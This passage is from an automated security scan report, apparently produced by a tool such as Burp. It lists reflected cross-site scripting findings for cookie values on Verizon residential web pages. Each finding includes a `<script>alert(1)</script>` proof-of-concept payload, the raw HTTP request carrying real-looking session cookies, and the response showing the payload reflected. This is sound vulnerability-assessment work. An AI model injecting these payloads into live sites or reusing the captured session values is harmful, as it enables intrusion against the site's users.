Cookie: Source=CHSI; vzapps=STATE=TX1327c'><script>alert(1)</script>eb0b45a8082; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 68022
Expires: Sat, 20 Nov 2010 00:11:52 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:11:52 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX1327c'><script>alert(1)</script>eb0b45a8082; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | High Speed Internet: Compare to Cable
</title><link rel="stylesheet" type="text/css" href="/Content/Commonfiles/includes/css/pro
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX1327C'><SCRIPT>ALERT(1)</SCRIPT>EB0B45A8082 ' />
...[SNIP]...

1.91. http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm [VzApps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm

Issue detail

The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9ed63'><script>alert(1)</script>aba8646129c was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX9ed63'><script>alert(1)</script>aba8646129c; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 68020
Expires: Sat, 20 Nov 2010 03:14:48 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:14:48 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX9ed63'><script>alert(1)</script>aba8646129c; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | High Speed Internet: Compare to Cable
</title><link rel="stylesheet" type="text/css" href="/Content/Commonfiles/includes/css/pro
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX9ED63'><SCRIPT>ALERT(1)</SCRIPT>ABA8646129C ' />
...[SNIP]...

1.92. http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm [VzApps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm

Issue detail

The value of the VzApps cookie is copied into the HTML document as plain text between tags. The payload 56a2d<script>alert(1)</script>eac0704937d was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX56a2d<script>alert(1)</script>eac0704937d; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 68015
Expires: Sat, 20 Nov 2010 03:15:03 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:15:03 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX56a2d<script>alert(1)</script>eac0704937d; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | High Speed Internet: Compare to Cable
</title><link rel="stylesheet" type="text/css" href="/Content/Commonfiles/includes/css/pro
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX56A2D<SCRIPT>ALERT(1)</SCRIPT>EAC0704937D </DIV>
...[SNIP]...

1.93. http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 98e16<script>alert(1)</script>9d0879de158 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX98e16<script>alert(1)</script>9d0879de158; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 68015
Expires: Sat, 20 Nov 2010 00:09:38 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:09:38 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX98e16<script>alert(1)</script>9d0879de158; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | High Speed Internet: Compare to Cable
</title><link rel="stylesheet" type="text/css" href="/Content/Commonfiles/includes/css/pro
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX98E16<SCRIPT>ALERT(1)</SCRIPT>9D0879DE158 </DIV>
...[SNIP]...

1.94. http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c0257'><script>alert(1)</script>be1613d7d65 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TXc0257'><script>alert(1)</script>be1613d7d65; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 68019
Expires: Sat, 20 Nov 2010 00:09:22 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:09:22 GMT
Connection: close
Set-Cookie: ContextInfo_State=TXc0257'><script>alert(1)</script>be1613d7d65; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | High Speed Internet: Compare to Cable
</title><link rel="stylesheet" type="text/css" href="/Content/Commonfiles/includes/css/pro
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXC0257'><SCRIPT>ALERT(1)</SCRIPT>BE1613D7D65 ' />
...[SNIP]...

1.95. http://www22.verizon.com/Residential/HighSpeedInternet/Installation/ [VzApps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/HighSpeedInternet/Installation/

Issue detail

The value of the VzApps cookie is copied into the HTML document as plain text between tags. The payload 640aa<script>alert(1)</script>383bb65ea2f was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/Installation/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX640aa<script>alert(1)</script>383bb65ea2f; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 57963
Expires: Sat, 20 Nov 2010 03:14:38 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:14:38 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX640aa<script>alert(1)</script>383bb65ea2f; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | Verizon High Speed Internet: Installation
</title><link rel="stylesheet" type="text/css" href="/Content/Commonfiles/includes/css/products_
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX640AA<SCRIPT>ALERT(1)</SCRIPT>383BB65EA2F </DIV>
...[SNIP]...

1.96. http://www22.verizon.com/Residential/HighSpeedInternet/Installation/ [VzApps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/HighSpeedInternet/Installation/

Issue detail

The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6487d'><script>alert(1)</script>b45a269dda5 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/Installation/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; 